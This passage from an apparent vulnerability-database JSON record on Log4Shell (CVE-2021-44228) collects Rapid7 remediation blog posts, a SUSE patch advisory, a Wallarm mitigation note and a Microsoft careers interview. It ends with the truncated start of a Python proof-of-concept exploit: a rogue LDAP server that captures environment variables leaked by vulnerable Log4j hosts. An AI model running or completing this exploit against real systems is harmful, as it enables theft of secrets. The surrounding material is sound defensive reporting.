[Video]](<https://www.rapid7.com/blog/post/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/>)\n * [Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T14:46:41", "type": "rapid7blog", "title": "Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa\u2019s List", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T14:46:41", "id": "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "href": "https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still _versions vulnerable to Log4Shell.\n\n\u201cWe're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolutely necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.\n\n * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)\n * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)\n * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)\n * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)\n * [ShadowServer](<https://www.shadowserver.org/>)\n * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)\n\n_**Additional reading:**_\n\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T18:00:00", "type": "rapid7blog", "title": "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T18:00:00", "id": "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "href": "https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-18T12:39:52", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for log4j fixes the following issues:\n\n - CVE-2021-44228: Fix a remote code execution vulnerability that existed\n in the LDAP JNDI parser. [bsc#1193611, CVE-2021-44228]\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-3999=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T00:00:00", "type": "suse", "title": "Security update for log4j (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T00:00:00", "id": "OPENSUSE-SU-2021:3999-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/5KJHAK7MUO47JBMMPGGMJ3EKQX3P7TAO/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-12-14T10:37:13", "description": "* Wallarm has rolled out the update to detect and mitigate CVE-2021-44228.\n * No additional actions are required from the customers\n * Attempts at exploitation will be automatically blocked in a blocking mode\n * When working in a monitoring mode, consider creating a virtual patch\n\n## Log4Shell\n\nA 0-day exploit in the Java core library log4j was discovered that results in [Remote Code Execution](<https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack>) (RCE) by simple 1-line exploit with JNDI URL. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. Read more.\n\nThe attack surface is very wide since it\u2019s almost impossible to find any single Java project without the log4j library enabled. It affects internal services and APIs that are based on Java and uses other API and application data to log them.\n\n## Wallarm update\n\nWallarm automatically identifies attempts of the Log4Shell exploitation and logs these attempts in the Wallarm Console. Corresponding changes have been added within two hours after the first information about CVE-2021-44228 has been published.\n\n\n\nYou can search for the relevant events by using filter by [CVE](<https://www.wallarm.com/what/common-vulnerabilities-and-exposures-cve>):\n\n\n\n## Mitigation\n\nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to support@wallarm.com if you need assistance.\n\nThe post [Log4j 0day mitigation update CVE-2021-44228](<https://lab.wallarm.com/cve-2021-44228-mitigation-update/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T20:56:40", "type": "wallarmlab", "title": "Log4j 0day mitigation update CVE-2021-44228", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:56:40", "id": "WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "href": "https://lab.wallarm.com/cve-2021-44228-mitigation-update/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-01-20T17:34:03", "description": "_The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Voice of the Community blog series, _[_Microsoft Security_](<https://www.microsoft.com/en-us/security/business>)_ Product Marketing Manager _[_Natalia Godyla_](<https://www.linkedin.com/in/nataliagodyla/>)_ talks with _[_Heath Adams_](<https://www.linkedin.com/in/heathadams/>)_, Chief Executive Officer (CEO) at _[_TCM Security_](<https://tcm-sec.com/>)_ about being a mentor, hiring new security talent, certifications, upskilling, the future of [_cybersecurity training_](<https://www.microsoft.com/security/blog/2021/10/21/defenders-wanted-building-the-new-cybersecurity-professionals/>), and lots more._\n\n**Natalia: What do you recommend to security leaders concerned with the talent shortfall?**\n\n**Heath: **There needs to be more openness and getting away from gatekeeping. In this industry, there&#x27;s a lot of, \u201cI went through this path, so you need to go through this path.\u201d Or \u201cI did these certifications, so you need to do these certifications.\u201d Everybody wants this perfect candidate\u2014somebody who has 10 years of experience\u2014even when they don&#x27;t necessarily need it. We need to be able to take somebody that\u2019s more junior, who we can help train. Or take someone with a clean slate.\n\nAs a manager, be open to more than just what&#x27;s on the Human Resources job description. And be open to new people with different backgrounds. People are coming from all walks of life and age groups. So, if you put those biases aside and just consider the person that&#x27;s in front of you, that will help with the job shortage and help close the talent gap.\n\n**Natalia: And how has the pandemic and the shift to hybrid work changed cybersecurity skilling?**\n\n**Heath: **I think it&#x27;s been a positive. In our field, the ability to work remotely was always there. But the pandemic shifted things, so more companies are starting to realize that fact. I\u2019ve worked jobs as a penetration tester where I had to relocate, even though I was working out of my home 95 percent of the time. Now, more companies are opening their eyes to talent that isn\u2019t local. You no longer have to look in big markets; you can look at somebody on the other side of the country who&#x27;s studying cybersecurity, and they can be an asset to your team.\n\nI was doing a lot of Twitch streaming during the shutdown, and I noticed our streams were way bigger than before. We had more people watching, more people interested. There&#x27;s a lot of people who took advantage of the shutdown to say, \u201cHey, this is my time to get focused. I want a new career.\u201d There are high-paying jobs and there&#x27;s remote work. And as I mentioned, you don&#x27;t need a specific background or degree to get into this field. People can come from all walks of life. I think the pandemic helped shine a light on that.\n\n**Natalia: You&#x27;re well known as The Cyber Mentor. How has mentoring impacted your career?**\n\n**Heath: **It keeps me on top of my game. I have to be able to give people direction and I don&#x27;t want to give out bad information, so, I&#x27;m making sure that I stay on top of what the industry changes are, where the jobs are heading, and how to interview properly\u2014all of which seem to change from year to year. It helps me stay in touch with the next generation that&#x27;s coming into the [security field](<https://www.microsoft.com/en-us/security>) as well.\n\n**Natalia: Do you have your own mentors that help you progress in your career?**\n\n**Heath: **I came up with what I call \u201ccommunity mentorship.\u201d I have a Discord community, and we use that to encourage other people to give back. You want to be able to help people when they need it or get help when you need it while learning from each other. When it\u2019s time for networking or needing a job, that goes a long way. For me, it&#x27;s more about being where there are groups of like-minded people. I&#x27;ve got a lot of friends that own penetration test companies, and we&#x27;ll get together, have lunch, talk strategies. What are you doing? What am I doing? That&#x27;s the kind of mentorship that we have with each other; just making sure we&#x27;re keeping each other in check, thinking about new things.\n\n**Natalia: What are the biggest struggles for early career mentees who are trying to grow their skills? And how can leaders address those challenges?**\n\n**Heath: **For a person looking to get a role, there are a few things to remember. One is to make sure you&#x27;re crawling before you walk, walking before you run. I&#x27;ll use hacking as an example. A lot of people get excited about hacking and think it sounds awesome. &quot;You can get paid money to hack something? I want to do that!&quot; And they try to jump right into it without building foundational skill sets, learning the parts of a computer, or learning how to do computer networking or basic troubleshooting. What I tell people is to break and fix computers. Understand basic hardware, basic computer networking, what IP addresses are, what a subnet is. Understand some coding, like Python. You don&#x27;t need a computer science background but having those foundational skills will go a long way.\n\nIf you don&#x27;t put a foundation under a house, it\u2019s going to collapse. So, you need to think about your career in the same way. You must make sure you&#x27;re building a foundation. People don&#x27;t realize the amount of effort that goes into getting into the field. Do your due diligence beforehand.\n\nThere&#x27;s also a lot of imposter syndrome in cybersecurity. I tell people not to concern themselves with others, especially on social media. They say comparison is the thief of joy, and I truly believe that. You have to make sure you&#x27;re running your own race. Even if you run the same mile as somebody else, and they finish it in 5 minutes, and you finish it in 10; you still finish the same mile. What matters is that you got there. As long as you&#x27;re trying to be better than you were yesterday, you&#x27;re going to make it a lot farther than you think.\n\nFinally, cybersecurity is a field that\u2019s constantly changing. For somebody who is complacent\u2014who wants to get a degree, get a job, and then is set\u2014cybersecurity is not the right fit. Cybersecurity is for somebody who\u2019s interested in constantly learning because there are always new vulnerabilities. There was just the [Log4J vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) that caused everyone concern. I had a meeting today with a client, and if I&#x27;m not prepared, I&#x27;m letting them down. I&#x27;m letting their security down as well. I spent the weekend studying because I had to. That\u2019s the business we\u2019re in.\n\nYou must stay on top of this from an employer side as well\u2014being able to train people and keep them up to date. TCM Security has a base foundation where we want our employees to be, and then we encourage them to gain knowledge where they&#x27;re most interested. I&#x27;ve been sent to a training that I had no interest in whatsoever and wanted to pull my hair out. As a manager, I ask, \u201cWhat do you want to learn?\u201d When I send an employee to a cybersecurity training that they\u2019re interested in, they\u2019re going to retain that information a lot better. They can then bring that information back to us, and we can use that in real-world scenarios.\n\n**Natalia: How can security leaders recruit security professionals to their teams better? What should they look out for? For example, how important are certifications?**\n\n**Heath: **For an entry-level role, [certifications are important](<https://docs.microsoft.com/en-us/learn/roles/security-engineer>). Their importance diminishes once you get into the field. But I&#x27;m an advocate for them; they help prove some knowledge\u2014so does having a blog, attending a conference, building a home lab, speaking at a conference, speaking at a local community group\u2014anything that says, \u201cI&#x27;m passionate about security.\u201d\n\nI have seen some entry-level roles where the interviewers have you code something, or have you fix broken code, just to make sure you logically understand what&#x27;s going on. You don&#x27;t have to be a developer or be able to code, but you must be able to understand what&#x27;s in front of you. Having some coding challenges during the hiring process can be beneficial\u2014but it should be open book. For a security professional, using search is 90 percent of our job, honestly. If you&#x27;re limiting somebody from searching online, you&#x27;re setting false expectations.\n\nI go back and re-watch videos and re-read blogs all the time, because there are so many different commands, and there&#x27;s no way of memorizing all of them. But you need to understand the concepts. If you understand the tool they might need to run or the concept of it, then you can search that, find the tool, and run it. That\u2019s more important.\n\n**Natalia: We&#x27;ve all read the statistics about burnout in the security industry. What do you recommend for leaders who want to better retain their talent?**\n\n**Heath: **You must be pro-mental health. Make sure there&#x27;s ample paid time off (PTO) and encourage employees to use it. Also, make sure that your employees can take time off beyond PTO. If they&#x27;re sick, they shouldn\u2019t feel like they\u2019re letting people down. That\u2019s why we have flexible schedules; we run on a 32-hour workweek. We try to give people as much time back and have a work-life balance. We also pay for training, so people can go and focus on topics they&#x27;re interested in. We make sure that we&#x27;re investing in our employees. It&#x27;s so much more expensive to rehire and retrain. I&#x27;d rather invest in an employee and keep their mental health at a high level, and make sure I&#x27;m giving them all the tools and training they need to perform successfully.\n\n**Natalia: What trends have you seen in cybersecurity skilling? What do you think is coming next in terms of how security professionals are trained up, recruited, and retained?**\n\n**Heath: **There are more people interested in the field, and that&#x27;s great. We&#x27;re starting to see a lot more training providers and training options. Back when I started, a lot of it was just reading blog posts, and there were maybe one or two training providers. Now, there are 10 or 15.\n\nMisinformation can be out there, or outdated information. If you search online for certification companies\u2014or even look at an online post from a year ago\u2014that information could be outdated. So again, this comes back to due diligence and making sure that you&#x27;re doing your research, not just relying on one source. If I was going to look for certifications to get into this field, I\u2019d look at 20 or 30 different resources, get a consensus of what polls the highest, then do my own research on those organizations. It&#x27;s great job skills practice to research and make sure you understand where you need to go.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nDisclaimer: The views expressed here are solely those of the author and do not represent the views of Microsoft Corporation.\n\nThe post [Build a stronger cybersecurity team through diversity and training](<https://www.microsoft.com/security/blog/2022/01/20/build-a-stronger-cybersecurity-team-through-diversity-and-training/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T17:00:00", "type": "mmpc", "title": "Build a stronger cybersecurity team through diversity and training", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-20T17:00:00", "id": "MMPC:BB2F5840056D55375C4A19D2FF07C695", "href": "https://www.microsoft.com/security/blog/2022/01/20/build-a-stronger-cybersecurity-team-through-diversity-and-training/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-12-14T16:48:36", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T00:00:00", "type": "packetstorm", "title": "Apache Log4j2 2.14.1 Information Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T00:00:00", "id": "PACKETSTORM:165261", "href": "https://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "sourceData": "`# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure \n# Date: 12/12/2021 \n# Exploit Author: leonjza \n# Vendor Homepage: https://logging.apache.org/log4j/2.x/ \n# Version: <= 2.14.1 \n# CVE: CVE-2021-44228 \n \n#!/usr/bin/env python3 \n \n# Pure python ENV variable leak PoC for CVE-2021-44228 \n# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 \n# \n# 2021 @leonjza \n \nimport argparse \nimport socketserver \nimport threading \nimport time \n \nimport requests \n \nLDAP_HEADER = b'\\x30\\x0c\\x02\\x01\\x01\\x61\\x07\\x0a\\x01\\x00\\x04\\x00\\x04\\x00\\x0a' \n \n \nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): \ndef handle(self) -> None: \nprint(f' i| new connection from {self.client_address[0]}') \n \nsock = self.request \nsock.recv(1024) \nsock.sendall(LDAP_HEADER) \n \ndata = sock.recv(1024) \ndata = data[9:] # strip header \n \n# example response \n# \n# ('Java version 11.0.13\\n' \n# '\\x01\\x00\\n' \n# '\\x01\\x03\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x0b' \n# 'objectClass0\\x00\\x1b0\\x19\\x04\\x172.16.840.1.113730.3.4.2') \n \ndata = data.decode(errors='ignore').split('\\n')[0] \nprint(f' v| extracted value: {data}') \n \n \nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): \npass \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='a simple log4j \n<=2.14 information disclosure poc ' \n'(ref: \nhttps://twitter.com/Black2Fan/status/1470281005038817284)') \nparser.add_argument('--target', '-t', 